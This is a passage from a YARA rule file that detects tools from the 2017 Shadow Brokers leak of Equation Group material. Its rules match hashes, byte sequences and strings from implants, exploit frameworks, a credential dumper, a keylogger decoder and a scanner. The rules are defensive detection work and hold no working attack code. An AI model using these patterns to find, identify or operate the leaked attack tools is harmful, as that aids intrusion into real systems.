"https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "f265defd87094c95c7d3ddf009d115207cd9d4007cf98629e814eda8798906af" hash2 = "8d62ca9e6d89f2b835d07deb5e684a576607e4fe3740f77c0570d7b16ebc2985" hash3 = "634a80e37e4b32706ad1ea4a2ff414473618a8c42a369880db7cc127c0eb705e" strings: $s1 = ".dllfD" fullword ascii $s2 = "Khsppxu" fullword ascii $s3 = "D$8.exe" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them ) } rule EquationGroup_Toolset_Apr17_GangsterThief_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "50b269bda5fedcf5a62ee0514c4b14d48d53dd18ac3075dcc80b52d0c2783e06" strings: $s1 = "\\\\.\\%s:" fullword wide $s4 = "raw_open CreateFile error" fullword ascii $s5 = "-PATHDELETED-" fullword ascii $s6 = "(deleted)" fullword wide $s8 = "NULLFILENAME" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 3 of them ) } rule EquationGroup_Toolset_Apr17_SetCallbackPorts { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "16f66c2593665c2507a78f96c0c2a9583eab0bda13a639e28f550c92f9134ff0" strings: $s1 = "USAGE: %s [port2] [port3] [port4] [port5] [port6]" fullword ascii $s2 = "You may enter between 1 and 6 ports to change the defaults." fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_DiBa_Target_BH_2000 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "0654b4b8727488769390cd091029f08245d690dd90d1120e8feec336d1f9e788" strings: $s2 = "0M1U1Z1p1" fullword ascii /* base64 encoded string '3U5gZu' */ $s14 = "SPRQWV" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and all of them ) } rule EquationGroup_Toolset_Apr17_rc5 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "69e2c68c6ea7be338497863c0c5ab5c77d5f522f0a84ab20fe9c75c7f81318eb" strings: $s1 = "Usage: %s [d|e] session_key ciphertext" fullword ascii $s2 = "where session_key and ciphertext are strings of hex" fullword ascii $s3 = "d = decrypt mode, e = encrypt mode" fullword ascii $s4 = "Bad mode, should be 'd' or 'e'" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 2 of them ) } rule EquationGroup_Toolset_Apr17_PC_Level_Generic { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "7a6488dd13936e505ec738dcc84b9fec57a5e46aab8aff59b8cfad8f599ea86a" hash2 = "0e3cfd48732d0b301925ea3ec6186b62724ec755ed40ed79e7cd6d3df511b8a0" hash3 = "d1d6e3903b6b92cc52031c963e2031b5956cadc29cc8b3f2c8f38be20f98a4a7" hash4 = "25a2549031cb97b8a3b569b1263c903c6c0247f7fff866e7ec63f0add1b4921c" hash5 = "591abd3d7ee214df25ac25682b673f02219da108d1384261052b5167a36a7645" hash6 = "6b71db2d2721ac210977a4c6c8cf7f75a8f5b80b9dbcece1bede1aec179ed213" hash7 = "7be4c05cecb920f1010fc13086635591ad0d5b3a3a1f2f4b4a9be466a1bd2b76" hash8 = "f9cbccdbdf9ffd2ebf1ee84d0ddddd24a61dbe0858ab7f0131bef6c7b9a19131" hash9 = "3cf7a01bdf8e73769c80b75ca269b506c33464d81f574ded8bb20caec2d4cd13" hash10 = "a87a871fe32c49862ed68fda99d92efd762a33ababcd9b6b2b909f2e01f59c16" strings: $s1 = "wshtcpip.WSHGetSocketInformation" fullword ascii $s2 = "\\\\.\\%hs" fullword ascii $s3 = ".?AVResultIp@Mini_Mcl_Cmd_NetConnections@@" fullword ascii $s4 = "Corporation. All rights reserved." fullword wide $s5 = { 49 83 3c 24 00 75 02 eb 5d 49 8b 34 24 0f b7 46 } $op1 = { 44 24 57 6f c6 44 24 58 6e c6 44 24 59 } $op2 = { c6 44 24 56 64 88 5c 24 57 } $op3 = { 44 24 6d 4c c6 44 24 6e 6f c6 44 24 6f } condition: uint16(0) == 0x5a4d and filesize < 400KB and ( 2 of ($s*) or all of ($op*) ) } rule EquationGroup_Toolset_Apr17_PC_Level3_http_exe { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "3e855fbea28e012cd19b31f9d76a73a2df0eb03ba1cb5d22aafe9865150b020c" strings: $s1 = "Copyright (C) Microsoft" fullword wide $op1 = { 24 39 65 c6 44 24 3a 6c c6 44 24 3b 65 c6 44 24 } $op2 = { 44 24 4e 41 88 5c 24 4f ff } $op3 = { 44 24 3f 6e c6 44 24 40 45 c6 44 24 41 } condition: ( uint16(0) == 0x5a4d and filesize < 400KB and all of them ) } rule EquationGroup_Toolset_Apr17_ParseCapture { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "c732d790088a4db148d3291a92de5a449e409704b12e00c7508d75ccd90a03f2" strings: $x1 = "* Encrypted log found. An encryption key must be provided" fullword ascii $x2 = "encryptionkey = e.g., \"00 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff\"" fullword ascii $x3 = "Decrypting with key '%02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x'" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 50KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_ActiveDirectory_Target { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "33c1b7fdee7c70604be1e7baa9eea231164e62d5d5090ce7f807f43229fe5c36" strings: $s1 = "(&(objectCategory=person)(objectClass=user)(cn=" fullword wide $s2 = "(&(objectClass=user)(objectCategory=person)" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of them ) } rule EquationGroup_Toolset_Apr17_PC_Legacy_dll { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "0cbc5cc2e24f25cb645fb57d6088bcfb893f9eb9f27f8851503a1b33378ff22d" strings: $op1 = { 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 } $op2 = { 49 c6 45 e1 73 c6 45 e2 57 c6 45 e3 } $op3 = { 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 6f c6 45 ea } condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of them ) } rule EquationGroup_Toolset_Apr17_svctouch { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "96b6a3c4f53f9e7047aa99fd949154745e05dc2fd2eb21ef6f0f9b95234d516b" strings: $s1 = "Causes: Firewall,Machine down,DCOM disabled\\not supported,etc." fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 10KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_pwd_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "ee72ac76d82dfec51c8fbcfb5fc99a0a45849a4565177e01d8d23a358e52c542" strings: $s1 = "7\"7(7/7>7O7]7o7w7" fullword ascii $op1 = { 40 50 89 44 24 18 FF 15 34 20 00 } condition: ( uint16(0) == 0x5a4d and filesize < 20KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_KisuComms_Target_2000 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "94eea1bad534a1dc20620919de8046c9966be3dd353a50f25b719c3662f22135" strings: $s1 = "363<3S3c3l3q3v3{3" fullword ascii $s2 = "3!3%3)3-3135393@5" fullword ascii /* Recommendation - verify the opcodes on Binarly : http://www.binar.ly */ /* Test each of them in the search field & reduce length until it generates matches */ $op0 = { eb 03 89 46 54 47 83 ff 1a 0f 8c 40 ff ff ff 8b } $op1 = { 8b 46 04 85 c0 74 0f 50 e8 34 fb ff ff 83 66 04 } $op2 = { c6 45 fc 02 8d 8d 44 ff ff ff e8 d2 2f 00 00 eb } condition: ( uint16(0) == 0x5a4d and filesize < 200KB and ( all of ($s*) or all of ($op*) ) ) } rule EquationGroup_Toolset_Apr17_SlDecoder { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "b220f51ca56d9f9d7d899fa240d3328535f48184d136013fd808d8835919f9ce" strings: $x1 = "Error in conversion. SlDecoder.exe at command line " fullword wide $x2 = "KeyLogger_Data" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Windows_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "d38ce396926e45781daecd18670316defe3caf975a3062470a87c1d181a61374" strings: $s2 = "0#0)0/050;0M0Y0h0|0" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 50KB and all of them ) } rule EquationGroup_Toolset_Apr17_msgkd_msslu64_msgki_mssld { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "9ab667b7b5b9adf4ff1d6db6f804824a22c7cc003eb4208d5b2f12809f5e69d0" hash2 = "320144a7842500a5b69ec16f81a9d1d4c8172bb92301afd07fb79bc0eca81557" hash3 = "c10f4b9abee0fde50fe7c21b9948a2532744a53bb4c578630a81d2911f6105a3" hash4 = "551174b9791fc5c1c6e379dac6110d0aba7277b450c2563e34581565609bc88e" hash5 = "8419866c9058d738ebc1a18567fef52a3f12c47270f2e003b3e1242d86d62a46" strings: $s1 = "PQRAPAQSTUVWARASATAUAVAW" fullword ascii $s2 = "SQRUWVAWAVAUATASARAQAP" fullword ascii $s3 = "iijymqp" fullword ascii $s4 = "AWAVAUATASARAQI" fullword ascii $s5 = "WARASATAUAVM" fullword ascii $op1 = { 0c 80 30 02 48 83 c2 01 49 83 e9 01 75 e1 c3 cc } $op2 = { e8 10 66 0d 00 80 66 31 02 48 83 c2 02 49 83 e9 } $op3 = { 48 b8 53 a5 e1 41 d4 f1 07 00 48 33 } condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and 2 of ($s*) or all of ($op*) ) } rule EquationGroup_Toolset_Apr17_DoubleFeatureDll_dll_3 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "515374423b8b132258bd91acf6f29168dcc267a3f45ecb9d1fe18ee3a253195b" strings: $a = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 } $b = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 } $c = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f } condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and all of them ) } rule EquationGroup_Toolset_Apr17_SetCallback { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "a8854f6b01d0e49beeb2d09e9781a6837a0d18129380c6e1b1629bc7c13fdea2" strings: $s2 = "*NOTE: This version of SetCallback does not work with PeddleCheap versions prior" fullword ascii $s3 = "USAGE: SetCallback " fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and all of them ) } rule EquationGroup_Toolset_Apr17__DoubleFeatureReader_DoubleFeatureReader_0 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "052e778c26120c683ee2d9f93677d9217e9d6c61ffc0ab19202314ab865e3927" hash2 = "5db457e7c7dba80383b1df0c86e94dc6859d45e1d188c576f2ba5edee139d9ae" strings: $x1 = "DFReader.exe logfile AESKey [-j] [-o outputfilename]" fullword ascii $x2 = "Double Feature Target Version" fullword ascii $x3 = "DoubleFeature Process ID" fullword ascii $op1 = { a1 30 21 41 00 89 85 d8 fc ff ff a1 34 21 41 00 } condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 1 of them ) or ( 2 of them ) } rule EquationGroup_Toolset_Apr17__vtuner_vtuner_1 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "3e6bec0679c1d8800b181f3228669704adb2e9cbf24679f4a1958e4cdd0e1431" hash2 = "b0d2ebf455092f9d1f8e2997237b292856e9abbccfbbebe5d06b382257942e0e" strings: $s1 = "Unable to get -w hash. %x" fullword wide $s2 = "!\"invalid instruction mnemonic constant Id3vil\"" fullword wide $s4 = "Unable to set -w provider. %x" fullword wide $op0 = { 2b c7 50 e8 3a 8c ff ff ff b6 c0 } $op2 = { a1 8c 62 47 00 81 65 e0 ff ff ff 7f 03 d8 8b c1 } condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and 2 of them ) } rule EquationGroup_Toolset_Apr17__ecwi_ESKE_EVFR_RPC2_2 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd" hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674" hash4 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337" strings: $s1 = "Target is share name" fullword ascii $s2 = "Could not make UdpNetbios header -- bailing" fullword ascii $s3 = "Request non-NT session key" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and all of them ) } rule EquationGroup_Toolset_Apr17__EAFU_ecwi_ESKE_EVFR_RPC2_4 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "3e181ca31f1f75a6244b8e72afaa630171f182fbe907df4f8b656cc4a31602f6" hash2 = "c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd" hash3 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" hash4 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674" hash5 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337" strings: $x1 = "* Listening Post DLL %s() returned error code %d." fullword ascii $s1 = "WsaErrorTooManyProcesses" fullword ascii $s2 = "NtErrorMoreProcessingRequired" fullword ascii $s3 = "Connection closed by remote host (TCP Ack/Fin)" fullword ascii $s4 = "ServerErrorBadNamePassword" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and all of ($s*) or 1 of ($x*) ) } rule EquationGroup_Toolset_Apr17__SendCFTrigger_SendPKTrigger_6 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "3bee31b9edca8aa010a4684c2806b0ca988b2bcc14ad0964fec4f11f3f6fb748" hash2 = "2f9c7a857948795873a61f4d4f08e1bd0a41e3d6ffde212db389365488fa6e26" strings: $s4 = "* Failed to connect to destination - %u" fullword wide $s6 = "* Failed to convert destination address into sockaddr_storage values" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 400KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__AddResource { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "e83e4648875d4c4aa8bc6f3c150c12bad45d066e2116087cdf78a4a4efbab6f0" hash2 = "5a04d65a61ef04f5a1cbc29398c767eada367459dc09c54c3f4e35015c71ccff" strings: $s1 = "%s cm 10 2000 \"c:\\MY DIR\\myapp.exe\" c:\\MyResourceData.dat" fullword ascii $s2 = " - the path to the PE binary to which to add the resource." fullword ascii $s3 = "Unable to get path for target binary." fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 2 of them ) } rule EquationGroup_Toolset_Apr17__ESKE_RPC2_8 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" hash2 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337" strings: $s4 = "Fragment: Packet too small to contain RPC header" fullword ascii $s5 = "Fragment pickup: SmbNtReadX failed" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 700KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__LSADUMP_Lp_ModifyPrivilege_Lp_PacketScan_Lp_put_Lp_RemoteExecute_Lp_Windows_Lp_wmi_Lp_9 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "c7bf4c012293e7de56d86f4f5b4eeb6c1c5263568cc4d9863a286a86b5daf194" hash2 = "d92928a867a685274b0a74ec55c0b83690fca989699310179e184e2787d47f48" hash3 = "2d963529e6db733c5b74db1894d75493507e6e40da0de2f33e301959b50f3d32" hash4 = "e9f6a84899c9a042edbbff391ca076169da1a6f6dfb61b927942fe4be3327749" hash5 = "d989d610b032c72252a2df284d0b53f63f382e305de2a18b453a0510ab6246a3" hash6 = "23d98bca1f6e2f6989d53c2f2adff996ede2c961ea189744f8ae65621003b8b1" hash7 = "d7ae24816fda190feda6a60639cf3716ea00fb63a4bd1069b8ce52d10ad8bc7f" strings: $x1 = "Injection Lib - " wide $x2 = "LSADUMP - - ERROR" wide condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__ETBL_ETRE_10 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef" hash2 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2" strings: $x1 = "Probe #2 usage: %s -i TargetIp -p TargetPort -r %d [-o TimeOut] -t Protocol -n IMailUserName -a IMailPassword" fullword ascii $x6 = "** RunExploit ** - EXCEPTION_EXECUTE_HANDLER : 0x%08X" fullword ascii $s19 = "Sending Implant Payload.. cEncImplantPayload size(%d)" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__ELV_ESKE_ETBL_ETRE_EVFR_11 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f" hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" hash3 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef" hash4 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2" hash5 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674" strings: $x1 = "Target is vulnerable" fullword ascii $x2 = "Target is NOT vulnerable" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__ELV_ESKE_EVFR_RideArea2_12 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f" hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674" hash4 = "e702223ab42c54fff96f198611d0b2e8a1ceba40586d466ba9aadfa2fd34386e" strings: $x2 = "** CreatePayload ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and all of them ) } rule EquationGroup_Toolset_Apr17__ELV_ESKE_13 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f" hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" strings: $x1 = "Skip call to PackageRideArea(). Payload has already been packaged. Options -x and -q ignored." fullword ascii $s2 = "ERROR: pGvars->pIntRideAreaImplantPayload is NULL" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 600KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__NameProbe_SMBTOUCH_14 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "fbe3a4501654438f502a93f51b298ff3abf4e4cad34ce4ec0fad5cb5c2071597" hash2 = "7da350c964ea43c149a12ac3d2ce4675cedc079ddc10d1f7c464b16688305309" strings: $s1 = "DEC Pathworks TCPIP service on Windows NT" fullword ascii $s2 = "<\\\\__MSBROWSE__> G" fullword ascii $s3 = "" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and all of them ) } rule EquationGroup_Toolset_Apr17__ELV_ESKE_EVFR_RPC2_15 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f" hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674" hash4 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337" strings: $x1 = "** SendAndReceive ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii $s8 = "Binding to RPC Interface %s over named pipe" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__ELV_ESKE_EVFR_16 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f" hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674" strings: $x1 = "ERROR: TbMalloc() failed for encoded exploit payload" fullword ascii $x2 = "** EncodeExploitPayload ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii $x4 = "** RunExploit ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii $s6 = "Sending Implant Payload (%d-bytes)" fullword ascii $s7 = "ERROR: Encoder failed on exploit payload" fullword ascii $s11 = "ERROR: VulnerableOS() != RET_SUCCESS" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__ETBL_ETRE_SMBTOUCH_17 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef" hash2 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2" hash3 = "7da350c964ea43c149a12ac3d2ce4675cedc079ddc10d1f7c464b16688305309" strings: $x1 = "ERROR: Connection terminated by Target (TCP Ack/Fin)" fullword ascii $s2 = "Target did not respond within specified amount of time" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 1 of them ) } /* Yara Rule Set Author: Florian Roth Date: 2017-04-17 Identifier: Equation Group Tool Output Reference: Internal Research */ /* Rule Set ----------------------------------------------------------------- */ rule EquationGroup_scanner_output { meta: description = "Detects output generated by EQGRP scanner.exe" author = "Florian Roth" reference = "Internal Research" date = "2017-04-17" strings: $s0 = "# scanning ip " ascii $s1 = "# Scan for windows boxes" ascii fullword $s2 = "Going into send" ascii fullword $s3 = "# Does not work" ascii fullword $s4 = "You are the weakest link, goodbye" ascii fullword $s5 = "rpc Scan for RPC folks" ascii fullword condition: filesize < 1000KB and 2 of them }